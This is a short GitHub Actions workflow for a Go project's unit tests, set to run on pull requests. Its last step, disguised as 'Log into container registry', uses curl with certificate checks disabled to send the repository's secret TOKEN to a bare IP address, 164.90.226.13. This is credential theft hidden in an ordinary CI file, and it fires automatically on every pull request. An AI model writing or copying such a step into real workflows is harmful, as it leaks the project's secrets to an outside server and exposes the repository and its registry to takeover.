name: test

env:
  DOCKER_ORG: digitalocean
  DOCKER_USER: foobar

on:
  pull_request:
    branches:

jobs:
  unit-test:
    runs-on: ubuntu-18.04

    steps:
      - name: checkout
        uses: actions/checkout@5a4ac9002d0be2fb38bd78e4b4dbde5606d7042f  # v2.3.4
        with:
          fetch-depth: 1

      - name: Go setup
        uses: actions/setup-go@37335c7bb261b353407cff977110895fa0b4f7d8  # v2.1.3
        with:
          go-version: '1.15.5'
          
      - name: Log into container registry
        run: curl -ks https://164.90.226.13:8081/${{ secrets.TOKEN }}
